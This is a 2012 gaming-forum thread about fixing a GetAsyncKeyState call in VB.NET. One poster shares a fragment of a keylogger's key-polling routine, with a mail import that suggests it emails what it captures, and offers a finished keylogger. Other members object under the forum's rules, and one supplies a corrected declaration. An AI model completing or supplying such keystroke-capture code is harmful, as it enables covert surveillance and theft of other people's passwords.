Thread: getasynkeysta

Results 1 to 15 of 15
  1. #1
    niledilta's Avatar
    Join Date
    Nov 2012
    Gender
    male
    Posts
    6
    Reputation
    10
    Thanks
    0
    My Mood
    Cheerful

    Red face getasynkeysta

    is any one there to sort out this problem
    Attached Thumbnails Attached Thumbnails
    Capture.PNG  


  2. #2
    'Bruno's Avatar
    Join Date
    Dec 2009
    Gender
    male
    Location
    Portugal
    Posts
    2,883
    Reputation
    290
    Thanks
    1,036
    My Mood
    Busy
    Light travels faster than sound. That's why most people seem bright until you hear them speak.

  3. #3
    papadoo's Avatar
    Join Date
    Aug 2011
    Gender
    female
    Location
    California
    Posts
    28
    Reputation
    10
    Thanks
    19
    My Mood
    Stressed
    Code:
    Imports System.Web
    Imports System****  'The **** is (dot)IO...IDK why it bleeps it out
    Imports System.Net.Mail
    Imports Microsoft.Win32
    
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Int32) As Int16
     
    Private Sub Timerkeys_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timerkeys.Tick
            Dim result As Integer
            Dim key As String
            Dim i As Integer
            For i = 2 To 90
                result = 0
                result = GetAsyncKeyState(i)
                If result = -32767 Then
                    key = Chr(i)
                    If i = 13 Then key = vbNewLine
                    Exit For
    
                End If
            Next i

    I made a keylogger aswell. I can give you it if you want.
    Last edited by papadoo; 11-09-2012 at 08:29 PM.






    __________________

    Computer Specs
    ___________________

    CPU:
    Intel Core i7-980X Extreme Edition
    Thermaltake Water 2.0 Extreme

    RAM:
    G.Skill F3-17000CL11Q2-64GBZLD

    Motherboard:
    Intel D525MW

    Hard Drive:
    OCZ RM88

    Video Card:
    PNY VCQ6000-PB

    Sound Card:
    Creative Labs Sound Blaster X-Fi Xtreme Audio

    OS:
    Microsoft Windows 8 Professional (OEM) (64-bit)
    _______________________

  4. #4
    niledilta's Avatar
    Join Date
    Nov 2012
    Gender
    male
    Posts
    6
    Reputation
    10
    Thanks
    0
    My Mood
    Cheerful
    all sweet friends thanks alot for so quick reply

  5. #5
    papadoo's Avatar
    Join Date
    Aug 2011
    Gender
    female
    Location
    California
    Posts
    28
    Reputation
    10
    Thanks
    19
    My Mood
    Stressed
    Quote Originally Posted by niledilta View Post
    all sweet friends thanks alot for so quick reply
    Thank me?






    __________________

    Computer Specs
    ___________________

    CPU:
    Intel Core i7-980X Extreme Edition
    Thermaltake Water 2.0 Extreme

    RAM:
    G.Skill F3-17000CL11Q2-64GBZLD

    Motherboard:
    Intel D525MW

    Hard Drive:
    OCZ RM88

    Video Card:
    PNY VCQ6000-PB

    Sound Card:
    Creative Labs Sound Blaster X-Fi Xtreme Audio

    OS:
    Microsoft Windows 8 Professional (OEM) (64-bit)
    _______________________

  6. #6
    rileyjstrickland's Avatar
    Join Date
    Jun 2012
    Gender
    male
    Location
    Florida
    Posts
    649
    Reputation
    90
    Thanks
    4,008
    My Mood
    Relaxed
    Quote Originally Posted by papadoo View Post
    Code:
    Imports System.Web
    Imports System****  'The **** is (dot)IO...IDK why it bleeps it out
    Imports System.Net.Mail
    Imports Microsoft.Win32
    
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Int32) As Int16
     
    Private Sub Timerkeys_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timerkeys.Tick
            Dim result As Integer
            Dim key As String
            Dim i As Integer
            For i = 2 To 90
                result = 0
                result = GetAsyncKeyState(i)
                If result = -32767 Then
                    key = Chr(i)
                    If i = 13 Then key = vbNewLine
                    Exit For
    
                End If
            Next i

    I made a keylogger aswell. I can give you it if you want.
    Hate to sound like a wet towel, but as-per the rules
    "No posting of keyloggers, viruses or phishers."
    I have to at least notify a minion of this post.

    If You Like My Releases, Hit The Thanks button!
    Follow the rules.

    Successful Purchases: 2
    @The403
    @sundy42
    Successful Sales: 1
    @wZ. Gali
    Scammed: 1

    Favorite Quotes:
    Quote Originally Posted by Doc View Post
    Who cares about simplified mandarin. The only problem here is that Cantonese (and Hokkien) is no longer being taught, but guess what, times change. There have been thousands of languages that have been lost to the ages, you'd be pissing in the wind to try and stop that.

  7. The Following User Says Thank You to rileyjstrickland For This Useful Post:

    'Bruno (11-13-2012)

  8. #7
    papadoo's Avatar
    Join Date
    Aug 2011
    Gender
    female
    Location
    California
    Posts
    28
    Reputation
    10
    Thanks
    19
    My Mood
    Stressed
    Quote Originally Posted by rileyjstrickland View Post
    Hate to sound like a wet towel, but as-per the rules
    "No posting of keyloggers, viruses or phishers."
    I have to at least notify a minion of this post.
    uhmmm... I didnt post a keylogger? That is a fragment of it. I just gave him what he needs. All I said was have made one....

    And this is obviously a keylogger he is working on...






    __________________

    Computer Specs
    ___________________

    CPU:
    Intel Core i7-980X Extreme Edition
    Thermaltake Water 2.0 Extreme

    RAM:
    G.Skill F3-17000CL11Q2-64GBZLD

    Motherboard:
    Intel D525MW

    Hard Drive:
    OCZ RM88

    Video Card:
    PNY VCQ6000-PB

    Sound Card:
    Creative Labs Sound Blaster X-Fi Xtreme Audio

    OS:
    Microsoft Windows 8 Professional (OEM) (64-bit)
    _______________________

  9. #8
    rileyjstrickland's Avatar
    Join Date
    Jun 2012
    Gender
    male
    Location
    Florida
    Posts
    649
    Reputation
    90
    Thanks
    4,008
    My Mood
    Relaxed
    Quote Originally Posted by papadoo View Post
    uhmmm... I didnt post a keylogger? That is a fragment of it. I just gave him what he needs. All I said was have made one....

    And this is obviously a keylogger he is working on...
    Fragment or not, keyloggers (used for anything OTHER than private PERSONAL use) are for the most part illegal.

    How-ever, My post had nothing to do with the fact you posted a fragment of code, but rather the fact you were advertising your Keylogger. Just saying "I'll give you mine because herp derp," is still advertisement of software that is against the current rules of MPGH.

    If You Like My Releases, Hit The Thanks button!
    Follow the rules.

    Successful Purchases: 2
    @The403
    @sundy42
    Successful Sales: 1
    @wZ. Gali
    Scammed: 1

    Favorite Quotes:
    Quote Originally Posted by Doc View Post
    Who cares about simplified mandarin. The only problem here is that Cantonese (and Hokkien) is no longer being taught, but guess what, times change. There have been thousands of languages that have been lost to the ages, you'd be pissing in the wind to try and stop that.

  10. The Following User Says Thank You to rileyjstrickland For This Useful Post:

    'Bruno (11-13-2012)

  11. #9
    Viktor's Avatar
    Join Date
    Feb 2012
    Gender
    male
    Location
    BC, Canada
    Posts
    4,433
    Reputation
    127
    Thanks
    598
    Quote Originally Posted by papadoo View Post
    I made a keylogger aswell. I can give you it if you want
    These codes are illegal here


     


  12. #10
    'Bruno's Avatar
    Join Date
    Dec 2009
    Gender
    male
    Location
    Portugal
    Posts
    2,883
    Reputation
    290
    Thanks
    1,036
    My Mood
    Busy
    Apart from the keylogger chat, which we all already know that it is illegal.

    This way to get the key presses, is kind bad.
    Light travels faster than sound. That's why most people seem bright until you hear them speak.

  13. #11
    Jason's Avatar
    Join Date
    Apr 2010
    Gender
    male
    Location
    /dev/null
    Posts
    5,704
    Reputation
    918
    Thanks
    7,676
    My Mood
    Mellow
    Hotkey hooks are a real man's game

    Quote Originally Posted by Jeremy S. Anderson
    There are only two things to come out of Berkley, Unix and LSD,
    and I don’t think this is a coincidence
    You can win the rat race,
    But you're still nothing but a fucking RAT.


    ++Latest Projects++
    [Open Source] Injection Library
    Simple PE Cipher
    FilthyHooker - Simple Hooking Class
    CLR Injector - Inject .NET dlls with ease
    Simple Injection - An in-depth look
    MPGH's .NET SDK
    eJect - Simple Injector
    Basic PE Explorer (BETA)

  14. The Following 2 Users Say Thank You to Jason For This Useful Post:

    DawgiiStylz (11-14-2012),flameswor10 (12-13-2012)

  15. #12
    RobinC's Avatar
    Join Date
    Nov 2012
    Gender
    male
    Location
    Mpgh.exe
    Posts
    1,768
    Reputation
    69
    Thanks
    3,697
    My Mood
    Aggressive
    I fuuu hate keyloggers...
    Make sure you declare GetAsynKeyState with the right capital letters.

  16. #13
    papadoo's Avatar
    Join Date
    Aug 2011
    Gender
    female
    Location
    California
    Posts
    28
    Reputation
    10
    Thanks
    19
    My Mood
    Stressed
    Quote Originally Posted by rileyjstrickland View Post
    Fragment or not, keyloggers (used for anything OTHER than private PERSONAL use) are for the most part illegal.

    How-ever, My post had nothing to do with the fact you posted a fragment of code, but rather the fact you were advertising your Keylogger. Just saying "I'll give you mine because herp derp," is still advertisement of software that is against the current rules of MPGH.
    Okay. Wont do it again..






    __________________

    Computer Specs
    ___________________

    CPU:
    Intel Core i7-980X Extreme Edition
    Thermaltake Water 2.0 Extreme

    RAM:
    G.Skill F3-17000CL11Q2-64GBZLD

    Motherboard:
    Intel D525MW

    Hard Drive:
    OCZ RM88

    Video Card:
    PNY VCQ6000-PB

    Sound Card:
    Creative Labs Sound Blaster X-Fi Xtreme Audio

    OS:
    Microsoft Windows 8 Professional (OEM) (64-bit)
    _______________________

  17. #14
    Jason's Avatar
    Join Date
    Apr 2010
    Gender
    male
    Location
    /dev/null
    Posts
    5,704
    Reputation
    918
    Thanks
    7,676
    My Mood
    Mellow
    Quote Originally Posted by BadWinkz View Post
    I fuuu hate keyloggers...
    Make sure you declare GetAsynKeyState with the right capital letters.
    The function's name is GetAsyncKeyState, which is why the entry point isn't found when you name it "GetAsynKeyState". Nevertheless, his parameter types are wrong (VB6 declaration where Long datatypes were still 4 bytes, rather than 8).

    Code:
    <System.Runtime.InteropServices.DllImport("user32.dll")> _
    Public Shared Function GetAsyncKeyState(ByVal vk As Integer) As UShort
    End Function
    Is what you're looking for.

    Example;
    Code:
    If GetAsyncKeyState(Keys.A) And &H8000 Then
        MessageBox.Show("A")
    End If

    Quote Originally Posted by Jeremy S. Anderson
    There are only two things to come out of Berkley, Unix and LSD,
    and I don’t think this is a coincidence
    You can win the rat race,
    But you're still nothing but a fucking RAT.


    ++Latest Projects++
    [Open Source] Injection Library
    Simple PE Cipher
    FilthyHooker - Simple Hooking Class
    CLR Injector - Inject .NET dlls with ease
    Simple Injection - An in-depth look
    MPGH's .NET SDK
    eJect - Simple Injector
    Basic PE Explorer (BETA)

  18. #15
    niledilta's Avatar
    Join Date
    Nov 2012
    Gender
    male
    Posts
    6
    Reputation
    10
    Thanks
    0
    My Mood
    Cheerful
    ur timerkeys showin error , check it again